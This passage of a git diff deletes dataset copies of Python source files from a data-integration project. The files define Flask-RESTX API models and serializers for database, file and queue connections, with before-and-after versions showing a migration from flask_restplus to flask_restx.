json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - result_model['Connection'] = connection - return result_model - - @staticmethod - def get_connection_file_model(connection_file: ConnectionFile) -> ConnectionFileModel: - connection = ConnectionModels.get_connection_model(connection_file.Connection) - connector_type = ConnectionModels.get_connector_type_model(connection_file.ConnectorType) - entity_model = ConnectionModels.get_connection_file_entity_model(connection_file) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - result_model['Connection'] = connection - return result_model - - @staticmethod - def get_connection_database_models(connection_databases: List[ConnectionDatabase]) -> List[ConnectionDatabaseModel]: - - entities = [] - for connection_database in connection_databases: - entity = ConnectionModels.get_connection_database_model(connection_database) - entities.append(entity) - return entities - - @staticmethod - def get_connection_database_result_model(connection_database: ConnectionDatabase) -> ConnectionDatabaseModel: - connector_type = ConnectionModels.get_connector_type_model(connection_database.ConnectorType) - entity_model = ConnectionModels.get_connection_database_entity_model(connection_database) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - return result_model - - @staticmethod - def get_connection_file_result_model(connection_file: ConnectionFile) -> ConnectionFileModel: - connector_type = ConnectionModels.get_connector_type_model(connection_file.ConnectorType) - entity_model = ConnectionModels.get_connection_file_entity_model(connection_file) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - return result_model - - @staticmethod - def get_connection_queue_result_model(connection_queue: ConnectionQueue) -> ConnectionQueueModel: - connector_type = ConnectionModels.get_connector_type_model(connection_queue.ConnectorType) - entity_model = ConnectionModels.get_connection_queue_entity_model(connection_queue) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - return result_model - - @staticmethod - def get_connection_result_model(connection: Connection) -> ConnectionModel: - connection_type = ConnectionModels.get_connection_type_model(connection.ConnectionType) - entity_model = ConnectionModel( - Id=connection.Id, - Name=connection.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectionType'] = connection_type - if connection.ConnectionServers is not None: - result_model['Servers'] = ConnectionModels.get_connection_server_models(connection.ConnectionServers) - - if connection.Database is not None: - connection_database = ConnectionModels.get_connection_database_result_model(connection.Database) - result_model['Database'] = connection_database - if connection.File is not None: - connection_file = ConnectionModels.get_connection_file_result_model(connection.File) - result_model['File'] = connection_file - if connection.Queue is not None: - connection_queue = ConnectionModels.get_connection_queue_result_model(connection.Queue) - result_model['Queue'] = connection_queue - return result_model - - @staticmethod - def get_connection_result_models(connections: List[Connection]) -> List[ConnectionModel]: - entities = [] - for connection in connections: - entity = ConnectionModels.get_connection_result_model(connection) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.target.py deleted file mode 100644 index c5034b5..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.target.py +++ /dev/null @@ -1,357 +0,0 @@ -import json -from typing import List - -from flask_restx import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from IocManager import IocManager -from models.dao.connection import ConnectionFile, ConnectionServer, ConnectionQueue -from models.dao.connection.Connection import Connection -from models.dao.connection.ConnectionDatabase import ConnectionDatabase -from models.dao.connection.ConnectorType import ConnectorType -from models.dao.connection.ConnectionType import ConnectionType - - -class ConnectionTypeModel(EntityModel): - - def __init__(self, - Id=None, - Name=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Name = Name - - -class ConnectorTypeModel(EntityModel): - - def __init__(self, - Id=None, - Name=None, - ConnectionType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Name = Name - self.ConnectionType = ConnectionType - - -class ConnectionModel(EntityModel): - def __init__(self, - Id=None, - Name=None, - ConnectionType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Name = Name - self.ConnectionType = ConnectionType - - -class ConnectionServerModel(EntityModel): - - def __init__(self, - Id=None, - Host=None, - Port=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Host = Host - self.Port = Port - - -class ConnectionDatabaseModel(EntityModel): - - def __init__(self, - Id=None, - Sid: str = None, - ServiceName: str = None, - DatabaseName: str = None, - User: str = None, - Password: str = None, - Connection=None, - ConnectorType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Sid: str = Sid - self.ServiceName: str = ServiceName - self.DatabaseName: str = DatabaseName - self.User: str = User - self.Password: str = Password - self.Connection = Connection - self.ConnectorType = ConnectorType - - -class ConnectionFileModel(EntityModel): - - def __init__(self, - Id=None, - User: str = None, - Password: str = None, - Connection=None, - ConnectorType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.User: str = User - self.Password: str = Password - self.Connection = Connection - self.ConnectorType = ConnectorType - - -class ConnectionQueueModel(EntityModel): - - def __init__(self, - Id=None, - Protocol: str = None, - Mechanism: str = None, - User: str = None, - Password: str = None, - Connection=None, - ConnectorType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Protocol: str = Protocol - self.Mechanism: str = Mechanism - self.User: str = User - self.Password: str = Password - self.Connection = Connection - self.ConnectorType = ConnectorType - - -class ConnectionModels: - ns = IocManager.api.namespace('Connection', description='Connection endpoints', path='/api/Connection') - - create_connection_database_model = IocManager.api.model('ConnectionDatabaseModel', { - 'Name': fields.String(description='Operation code value', required=True), - 'ConnectorTypeName': fields.String(description='ConnectorTypeName', required=True), - 'Host': fields.String(description='Host'), - 'Port': fields.Integer(description='Port'), - 'Sid': fields.String(description='Sid'), - 'ServiceName': fields.String(description='ServiceName'), - 'DatabaseName': fields.String(description='DatabaseName'), - 'User': fields.String(description='User'), - 'Password': fields.String(description='Password'), - }) - - create_connection_file_model = IocManager.api.model('ConnectionFileModel', { - 'Name': fields.String(description='Operation code value', required=True), - 'ConnectorTypeName': fields.String(description='ConnectorTypeName', required=True), - 'Host': fields.String(description='Host'), - 'Port': fields.Integer(description='Port'), - 'User': fields.String(description='User'), - 'Password': fields.String(description='Password'), - }) - create_connection_server_model = IocManager.api.model('ConnectionServerModel', { - 'Host': fields.String(description='Host'), - 'Port': fields.Integer(description='Port'), - }) - create_connection_queue_model = IocManager.api.model('ConnectionQueueModel', { - 'Name': fields.String(description='Operation code value', required=True), - 'ConnectorTypeName': fields.String(description='ConnectorTypeName', required=True), - 'Servers': fields.List(fields.Nested(create_connection_server_model), description='Queue Servers', - required=False), - 'Protocol': fields.String(description='Protocol'), - 'Mechanism': fields.String(description='Mechanism'), - 'User': fields.String(description='User'), - 'Password': fields.String(description='Password'), - }) - - delete_connection_database_model = IocManager.api.model('DeleteConnectionDatabaseModel', { - 'Id': fields.Integer(description='Connection Database Id', required=True), - }) - - check_connection_database_model = IocManager.api.model('CheckConnectionDatabaseModel', { - 'Name': fields.String(description='Connection Name', required=True), - 'Schema': fields.String(description='Schema For Check Connection', required=False, example=""), - 'Table': fields.String(description='Table For Check Connection', required=False, example=""), - }) - - @staticmethod - def get_connection_server_model(connection_server: ConnectionServer) -> ConnectionServerModel: - entity_model = ConnectionServerModel( - Id=connection_server.Id, - Host=connection_server.Host, - Port=connection_server.Port, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - return result_model - - @staticmethod - def get_connection_server_models(connection_servers: List[ConnectionServer]) -> List[ConnectionServerModel]: - - entities = [] - for connection_server in connection_servers: - if connection_server.IsDeleted == 0: - entity = ConnectionModels.get_connection_server_model(connection_server) - entities.append(entity) - return entities - - @staticmethod - def get_connection_type_model(connection_type: ConnectionType) -> ConnectionTypeModel: - entity_model = ConnectionTypeModel( - Id=connection_type.Id, - Name=connection_type.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - return result_model - - @staticmethod - def get_connection_type_models(connection_types: List[ConnectionType]) -> List[ConnectionTypeModel]: - - entities = [] - for connection_type in connection_types: - entity = ConnectionModels.get_connection_type_model(connection_type) - entities.append(entity) - return entities - - @staticmethod - def get_connector_type_model(connector_type: ConnectorType) -> ConnectorTypeModel: - connection_type = ConnectionModels.get_connection_type_model(connector_type.ConnectionType) - entity_model = ConnectorTypeModel( - Id=connector_type.Id, - Name=connector_type.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectionType'] = connection_type - - return result_model - - @staticmethod - def get_connector_type_models(connector_types: List[ConnectorType]) -> List[ConnectorTypeModel]: - - entities = [] - for connector_type in connector_types: - entity = ConnectionModels.get_connector_type_model(connector_type) - entities.append(entity) - return entities - - @staticmethod - def get_connection_model(connection: Connection) -> ConnectionModel: - connection_type = ConnectionModels.get_connection_type_model(connection.ConnectionType) - entity_model = ConnectionModel( - Id=connection.Id, - Name=connection.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectionType'] = connection_type - return result_model - - @staticmethod - def get_connection_database_entity_model(connection_database: ConnectionDatabase) -> ConnectionDatabaseModel: - entity_model = ConnectionDatabaseModel( - Id=connection_database.Id, - Sid=connection_database.Sid, - ServiceName=connection_database.ServiceName, - DatabaseName=connection_database.DatabaseName, - User='***', # connection_database.User - Password='***' # connection_database.Password - ) - return entity_model - - @staticmethod - def get_connection_file_entity_model(connection_file: ConnectionFile) -> ConnectionFileModel: - entity_model = ConnectionFileModel( - Id=connection_file.Id, - User='***', # connection_database.User - Password='***' # connection_database.Password - ) - return entity_model - - @staticmethod - def get_connection_queue_entity_model(connection_queue: ConnectionQueue) -> ConnectionQueueModel: - entity_model = ConnectionQueueModel( - Id=connection_queue.Id, - Protocol=connection_queue.Protocol, - Mechanism=connection_queue.Mechanism, - User='***', # connection_database.User - Password='***' # connection_database.Password - ) - return entity_model - - @staticmethod - def get_connection_database_model(connection_database: ConnectionDatabase) -> ConnectionDatabaseModel: - connection = ConnectionModels.get_connection_model(connection_database.Connection) - connector_type = ConnectionModels.get_connector_type_model(connection_database.ConnectorType) - entity_model = ConnectionModels.get_connection_database_entity_model(connection_database) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - result_model['Connection'] = connection - return result_model - - @staticmethod - def get_connection_file_model(connection_file: ConnectionFile) -> ConnectionFileModel: - connection = ConnectionModels.get_connection_model(connection_file.Connection) - connector_type = ConnectionModels.get_connector_type_model(connection_file.ConnectorType) - entity_model = ConnectionModels.get_connection_file_entity_model(connection_file) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - result_model['Connection'] = connection - return result_model - - @staticmethod - def get_connection_database_models(connection_databases: List[ConnectionDatabase]) -> List[ConnectionDatabaseModel]: - - entities = [] - for connection_database in connection_databases: - entity = ConnectionModels.get_connection_database_model(connection_database) - entities.append(entity) - return entities - - @staticmethod - def get_connection_database_result_model(connection_database: ConnectionDatabase) -> ConnectionDatabaseModel: - connector_type = ConnectionModels.get_connector_type_model(connection_database.ConnectorType) - entity_model = ConnectionModels.get_connection_database_entity_model(connection_database) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - return result_model - - @staticmethod - def get_connection_file_result_model(connection_file: ConnectionFile) -> ConnectionFileModel: - connector_type = ConnectionModels.get_connector_type_model(connection_file.ConnectorType) - entity_model = ConnectionModels.get_connection_file_entity_model(connection_file) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - return result_model - - @staticmethod - def get_connection_queue_result_model(connection_queue: ConnectionQueue) -> ConnectionQueueModel: - connector_type = ConnectionModels.get_connector_type_model(connection_queue.ConnectorType) - entity_model = ConnectionModels.get_connection_queue_entity_model(connection_queue) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectorType'] = connector_type - return result_model - - @staticmethod - def get_connection_result_model(connection: Connection) -> ConnectionModel: - connection_type = ConnectionModels.get_connection_type_model(connection.ConnectionType) - entity_model = ConnectionModel( - Id=connection.Id, - Name=connection.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectionType'] = connection_type - if connection.ConnectionServers is not None: - result_model['Servers'] = ConnectionModels.get_connection_server_models(connection.ConnectionServers) - - if connection.Database is not None: - connection_database = ConnectionModels.get_connection_database_result_model(connection.Database) - result_model['Database'] = connection_database - if connection.File is not None: - connection_file = ConnectionModels.get_connection_file_result_model(connection.File) - result_model['File'] = connection_file - if connection.Queue is not None: - connection_queue = ConnectionModels.get_connection_queue_result_model(connection.Queue) - result_model['Queue'] = connection_queue - return result_model - - @staticmethod - def get_connection_result_models(connections: List[Connection]) -> List[ConnectionModel]: - entities = [] - for connection in connections: - entity = ConnectionModels.get_connection_result_model(connection) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.diff deleted file mode 100644 index 6bc96cc..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/src/api/controllers/integration/models/DataIntegrationModels.py b/src/api/controllers/integration/models/DataIntegrationModels.py - index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/controllers/integration/models/DataIntegrationModels.py - +++ b/src/api/controllers/integration/models/DataIntegrationModels.py -@@ -1,7 +1,7 @@ - import json - from typing import List - --from flask_restplus import fields -+from flask_restx import fields - - from controllers.common.models.CommonModels import EntityModel, CommonModels - from controllers.connection.models.ConnectionModels import ConnectionModels diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.source.py deleted file mode 100644 index eaab201..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.source.py +++ /dev/null @@ -1,289 +0,0 @@ -import json -from typing import List - -from flask_restplus import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from controllers.connection.models.ConnectionModels import ConnectionModels -from IocManager import IocManager -from models.dao.integration.DataIntegration import DataIntegration - - -class DataIntegrationModel(EntityModel): - - def __init__(self, - Id=None, - Code=None, - IsTargetTruncate=None, - IsDelta=None, - CreationDate=None, - Comments=None, - IsDeleted=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Code = Code - self.IsTargetTruncate = IsTargetTruncate - self.IsDelta = IsDelta - self.CreationDate = CreationDate - self.Comments = Comments - self.IsDeleted = IsDeleted - - -class DataIntegrationConnectionModel: - - def __init__(self, - Id: int = None, - SourceOrTarget: int = None, - DataIntegration=None, - Database=None, - File=None, - Connection=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id: int = Id - self.SourceOrTarget: int = SourceOrTarget - self.DataIntegration = DataIntegration - self.Database = Database - self.File = File - self.Connection = Connection - - -class DataIntegrationConnectionDatabaseModel: - - def __init__(self, - Id: int = None, - Schema: str = None, - TableName: str = None, - Query: str = None, - *args, **kwargs): - self.Id: int = Id - self.Schema: str = Schema - self.TableName: str = TableName - self.Query: str = Query - - -class DataIntegrationConnectionFileModel: - - def __init__(self, - Id: int = None, - Folder: str = None, - FileName: str = None, - *args, **kwargs): - self.Id: int = Id - self.Folder: str = Folder - self.FileName: str = FileName - - -class DataIntegrationConnectionQueueModel: - def __init__(self, - Id: int = None, - TopicName: str = None, - *args, **kwargs): - self.Id: int = Id - self.TopicName: str = TopicName - - -class DataIntegrationConnectionFileCsvModel: - - def __init__(self, - Id: int = None, - HasHeader: bool = None, - Header: str = None, - Separator: str = None, - *args, **kwargs): - self.Id: int = Id - self.HasHeader: bool = HasHeader - self.Header: str = Header - self.Separator: str = Separator - - -class DataIntegrationColumnModel: - - def __init__(self, - Id=None, - ResourceType=None, - SourceColumnName=None, - TargetColumnName=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.ResourceType = ResourceType - self.SourceColumnName = SourceColumnName - self.TargetColumnName = TargetColumnName - - -class DataIntegrationModels: - ns = IocManager.api.namespace('DataIntegration', description='Data Integration endpoints', - path='/api/DataIntegration') - - data_integration_connection_database_model = IocManager.api.model('DataIntegrationConnectionDatabaseModel', { - 'Schema': fields.String(description='Schema', required=False), - 'TableName': fields.String(description='TableName', required=False), - 'Query': fields.String(description='Query', required=False), - }) - - data_integration_connection_file_csv_model = IocManager.api.model('DataIntegrationConnectionFileCsvModel', { - 'HasHeader': fields.Boolean(description='HasHeader', required=False), - 'Header': fields.String(description='Header', required=False), - 'Separator': fields.String(description='Separator', required=False), - }) - - data_integration_connection_file_model = IocManager.api.model('DataIntegrationConnectionFileModel', { - 'Folder': fields.String(description='Folder', required=False), - 'FileName': fields.String(description='FileName', required=False), - 'Csv': fields.Nested(data_integration_connection_file_csv_model, description='Csv'), - }) - data_integration_connection_queue_model = IocManager.api.model('DataIntegrationConnectionQueueModel', { - 'TopicName': fields.String(description='TopicName', required=False), - }) - data_integration_connection_model = IocManager.api.model('DataIntegrationConnectionModel', { - 'ConnectionName': fields.String(description='ConnectionName', required=False), - 'Database': fields.Nested(data_integration_connection_database_model, description='Database connection'), - 'File': fields.Nested(data_integration_connection_file_model, description='File connection'), - 'Queue': fields.Nested(data_integration_connection_queue_model, description='Queue connection'), - 'Columns': fields.String(description='Columns'), - }) - - data_integration_model = IocManager.api.model('DataIntegrationModel', { - 'Code': fields.String(description='Operation code value', required=True), - 'SourceConnections': fields.Nested(data_integration_connection_model, description='Source Connections', - required=False), - 'TargetConnections': fields.Nested(data_integration_connection_model, - description='Target Connections', - required=True), - 'IsTargetTruncate': fields.Boolean(description='IsTargetTruncate', required=True), - 'IsDelta': fields.Boolean(description='IsDelta'), - 'Comments': fields.String(description='Comments'), - }) - - @staticmethod - def get_data_integration_model(data_integration: DataIntegration) -> DataIntegrationModel: - source_list = [x for x in data_integration.Connections if x.SourceOrTarget == 0] - source = None - if source_list is not None and len(source_list) > 0: - source_connection = source_list[0] - entity_source = DataIntegrationConnectionModel( - Id=source_connection.Id, - SourceOrTarget=source_connection.SourceOrTarget - ) - source = json.loads(json.dumps(entity_source.__dict__, default=CommonModels.date_converter)) - - if source_connection.Database is not None: - entity_source_database = DataIntegrationConnectionDatabaseModel( - Id=source_connection.Id, - Schema=source_connection.Database.Schema, - TableName=source_connection.Database.TableName, - Query=source_connection.Database.Query, - ) - source_database = json.loads( - json.dumps(entity_source_database.__dict__, default=CommonModels.date_converter)) - source['Database'] = source_database - if source_connection.File is not None: - entity_source_file = DataIntegrationConnectionFileModel( - Id=source_connection.Id, - Folder=source_connection.File.Folder, - FileName=source_connection.File.FileName - ) - source_file = json.loads(json.dumps(entity_source_file.__dict__, default=CommonModels.date_converter)) - - if source_connection.File.Csv is not None: - entity_source_file_csv = DataIntegrationConnectionFileCsvModel( - Id=source_connection.Id, - HasHeader=source_connection.File.Csv.HasHeader, - Header=source_connection.File.Csv.Header, - Separator=source_connection.File.Csv.Separator, - ) - source_file_csv = json.loads( - json.dumps(entity_source_file_csv.__dict__, default=CommonModels.date_converter)) - source_file['Csv'] = source_file_csv - source['File'] = source_file - - if source_connection.Queue is not None: - entity_source_queue = DataIntegrationConnectionQueueModel( - Id=source_connection.Id, - TopicName=source_connection.Queue.TopicName, - ) - source_queue = json.loads(json.dumps(entity_source_queue.__dict__, default=CommonModels.date_converter)) - source['Queue'] = source_queue - source['Connection'] = ConnectionModels.get_connection_result_model(source_connection.Connection) - - target_connection = [x for x in data_integration.Connections if x.SourceOrTarget == 1][0] - entity_target = DataIntegrationConnectionModel( - Id=target_connection.Id, - SourceOrTarget=target_connection.SourceOrTarget - ) - target = json.loads(json.dumps(entity_target.__dict__, default=CommonModels.date_converter)) - - if target_connection.Database is not None: - entity_target_database = DataIntegrationConnectionDatabaseModel( - Id=target_connection.Id, - Schema=target_connection.Database.Schema, - TableName=target_connection.Database.TableName, - Query=target_connection.Database.Query, - ) - target_database = json.loads( - json.dumps(entity_target_database.__dict__, default=CommonModels.date_converter)) - target['Database'] = target_database - if target_connection.File is not None: - entity_target_file = DataIntegrationConnectionFileModel( - Id=target_connection.Id, - FileName=target_connection.File.FileName - ) - target_file = json.loads(json.dumps(entity_target_file.__dict__, default=CommonModels.date_converter)) - - if target_connection.File.Csv is not None: - entity_target_file_csv = DataIntegrationConnectionFileCsvModel( - Id=target_connection.Id, - HasHeader=target_connection.File.Csv.HasHeader, - Header=target_connection.File.Csv.Header, - Separator=target_connection.File.Csv.Separator, - ) - target_file_csv = json.loads( - json.dumps(entity_target_file_csv.__dict__, default=CommonModels.date_converter)) - target_file['Csv'] = target_file_csv - target['File'] = target_file - if target_connection.Queue is not None: - entity_source_queue = DataIntegrationConnectionQueueModel( - Id=target_connection.Id, - TopicName=target_connection.Queue.TopicName, - ) - target_queue = json.loads(json.dumps(entity_source_queue.__dict__, default=CommonModels.date_converter)) - target['Queue'] = target_queue - target['Connection'] = ConnectionModels.get_connection_result_model(target_connection.Connection) - columns = [] - for col in data_integration.Columns: - entity_column = DataIntegrationColumnModel( - Id=col.Id, - ResourceType=col.ResourceType, - SourceColumnName=col.SourceColumnName, - TargetColumnName=col.TargetColumnName, - ) - column = json.loads(json.dumps(entity_column.__dict__, default=CommonModels.date_converter)) - columns.append(column) - entity_model = DataIntegrationModel( - Id=data_integration.Id, - Code=data_integration.Code, - IsTargetTruncate=data_integration.IsTargetTruncate, - IsDelta=data_integration.IsDelta, - CreationDate=data_integration.CreationDate, - Comments=data_integration.Comments, - IsDeleted=data_integration.IsDeleted - ) - - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - if source is not None: - result_model['SourceConnection'] = source - result_model['TargetConnection'] = target - result_model['Columns'] = columns - return result_model - - @staticmethod - def get_data_integration_models(data_integrations: List[DataIntegration]) -> List[DataIntegrationModel]: - - entities = [] - for data_integration in data_integrations: - if data_integration.IsDeleted == 0: - entity = DataIntegrationModels.get_data_integration_model(data_integration) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.target.py deleted file mode 100644 index bf84257..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.target.py +++ /dev/null @@ -1,289 +0,0 @@ -import json -from typing import List - -from flask_restx import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from controllers.connection.models.ConnectionModels import ConnectionModels -from IocManager import IocManager -from models.dao.integration.DataIntegration import DataIntegration - - -class DataIntegrationModel(EntityModel): - - def __init__(self, - Id=None, - Code=None, - IsTargetTruncate=None, - IsDelta=None, - CreationDate=None, - Comments=None, - IsDeleted=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Code = Code - self.IsTargetTruncate = IsTargetTruncate - self.IsDelta = IsDelta - self.CreationDate = CreationDate - self.Comments = Comments - self.IsDeleted = IsDeleted - - -class DataIntegrationConnectionModel: - - def __init__(self, - Id: int = None, - SourceOrTarget: int = None, - DataIntegration=None, - Database=None, - File=None, - Connection=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id: int = Id - self.SourceOrTarget: int = SourceOrTarget - self.DataIntegration = DataIntegration - self.Database = Database - self.File = File - self.Connection = Connection - - -class DataIntegrationConnectionDatabaseModel: - - def __init__(self, - Id: int = None, - Schema: str = None, - TableName: str = None, - Query: str = None, - *args, **kwargs): - self.Id: int = Id - self.Schema: str = Schema - self.TableName: str = TableName - self.Query: str = Query - - -class DataIntegrationConnectionFileModel: - - def __init__(self, - Id: int = None, - Folder: str = None, - FileName: str = None, - *args, **kwargs): - self.Id: int = Id - self.Folder: str = Folder - self.FileName: str = FileName - - -class DataIntegrationConnectionQueueModel: - def __init__(self, - Id: int = None, - TopicName: str = None, - *args, **kwargs): - self.Id: int = Id - self.TopicName: str = TopicName - - -class DataIntegrationConnectionFileCsvModel: - - def __init__(self, - Id: int = None, - HasHeader: bool = None, - Header: str = None, - Separator: str = None, - *args, **kwargs): - self.Id: int = Id - self.HasHeader: bool = HasHeader - self.Header: str = Header - self.Separator: str = Separator - - -class DataIntegrationColumnModel: - - def __init__(self, - Id=None, - ResourceType=None, - SourceColumnName=None, - TargetColumnName=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.ResourceType = ResourceType - self.SourceColumnName = SourceColumnName - self.TargetColumnName = TargetColumnName - - -class DataIntegrationModels: - ns = IocManager.api.namespace('DataIntegration', description='Data Integration endpoints', - path='/api/DataIntegration') - - data_integration_connection_database_model = IocManager.api.model('DataIntegrationConnectionDatabaseModel', { - 'Schema': fields.String(description='Schema', required=False), - 'TableName': fields.String(description='TableName', required=False), - 'Query': fields.String(description='Query', required=False), - }) - - data_integration_connection_file_csv_model = IocManager.api.model('DataIntegrationConnectionFileCsvModel', { - 'HasHeader': fields.Boolean(description='HasHeader', required=False), - 'Header': fields.String(description='Header', required=False), - 'Separator': fields.String(description='Separator', required=False), - }) - - data_integration_connection_file_model = IocManager.api.model('DataIntegrationConnectionFileModel', { - 'Folder': fields.String(description='Folder', required=False), - 'FileName': fields.String(description='FileName', required=False), - 'Csv': fields.Nested(data_integration_connection_file_csv_model, description='Csv'), - }) - data_integration_connection_queue_model = IocManager.api.model('DataIntegrationConnectionQueueModel', { - 'TopicName': fields.String(description='TopicName', required=False), - }) - data_integration_connection_model = IocManager.api.model('DataIntegrationConnectionModel', { - 'ConnectionName': fields.String(description='ConnectionName', required=False), - 'Database': fields.Nested(data_integration_connection_database_model, description='Database connection'), - 'File': fields.Nested(data_integration_connection_file_model, description='File connection'), - 'Queue': fields.Nested(data_integration_connection_queue_model, description='Queue connection'), - 'Columns': fields.String(description='Columns'), - }) - - data_integration_model = IocManager.api.model('DataIntegrationModel', { - 'Code': fields.String(description='Operation code value', required=True), - 'SourceConnections': fields.Nested(data_integration_connection_model, description='Source Connections', - required=False), - 'TargetConnections': fields.Nested(data_integration_connection_model, - description='Target Connections', - required=True), - 'IsTargetTruncate': fields.Boolean(description='IsTargetTruncate', required=True), - 'IsDelta': fields.Boolean(description='IsDelta'), - 'Comments': fields.String(description='Comments'), - }) - - @staticmethod - def get_data_integration_model(data_integration: DataIntegration) -> DataIntegrationModel: - source_list = [x for x in data_integration.Connections if x.SourceOrTarget == 0] - source = None - if source_list is not None and len(source_list) > 0: - source_connection = source_list[0] - entity_source = DataIntegrationConnectionModel( - Id=source_connection.Id, - SourceOrTarget=source_connection.SourceOrTarget - ) - source = json.loads(json.dumps(entity_source.__dict__, default=CommonModels.date_converter)) - - if source_connection.Database is not None: - entity_source_database = DataIntegrationConnectionDatabaseModel( - Id=source_connection.Id, - Schema=source_connection.Database.Schema, - TableName=source_connection.Database.TableName, - Query=source_connection.Database.Query, - ) - source_database = json.loads( - json.dumps(entity_source_database.__dict__, default=CommonModels.date_converter)) - source['Database'] = source_database - if source_connection.File is not None: - entity_source_file = DataIntegrationConnectionFileModel( - Id=source_connection.Id, - Folder=source_connection.File.Folder, - FileName=source_connection.File.FileName - ) - source_file = json.loads(json.dumps(entity_source_file.__dict__, default=CommonModels.date_converter)) - - if source_connection.File.Csv is not None: - entity_source_file_csv = DataIntegrationConnectionFileCsvModel( - Id=source_connection.Id, - HasHeader=source_connection.File.Csv.HasHeader, - Header=source_connection.File.Csv.Header, - Separator=source_connection.File.Csv.Separator, - ) - source_file_csv = json.loads( - json.dumps(entity_source_file_csv.__dict__, default=CommonModels.date_converter)) - source_file['Csv'] = source_file_csv - source['File'] = source_file - - if source_connection.Queue is not None: - entity_source_queue = DataIntegrationConnectionQueueModel( - Id=source_connection.Id, - TopicName=source_connection.Queue.TopicName, - ) - source_queue = json.loads(json.dumps(entity_source_queue.__dict__, default=CommonModels.date_converter)) - source['Queue'] = source_queue - source['Connection'] = ConnectionModels.get_connection_result_model(source_connection.Connection) - - target_connection = [x for x in data_integration.Connections if x.SourceOrTarget == 1][0] - entity_target = DataIntegrationConnectionModel( - Id=target_connection.Id, - SourceOrTarget=target_connection.SourceOrTarget - ) - target = json.loads(json.dumps(entity_target.__dict__, default=CommonModels.date_converter)) - - if target_connection.Database is not None: - entity_target_database = DataIntegrationConnectionDatabaseModel( - Id=target_connection.Id, - Schema=target_connection.Database.Schema, - TableName=target_connection.Database.TableName, - Query=target_connection.Database.Query, - ) - target_database = json.loads( - json.dumps(entity_target_database.__dict__, default=CommonModels.date_converter)) - target['Database'] = target_database - if target_connection.File is not None: - entity_target_file = DataIntegrationConnectionFileModel( - Id=target_connection.Id, - FileName=target_connection.File.FileName - ) - target_file = json.loads(json.dumps(entity_target_file.__dict__, default=CommonModels.date_converter)) - - if target_connection.File.Csv is not None: - entity_target_file_csv = 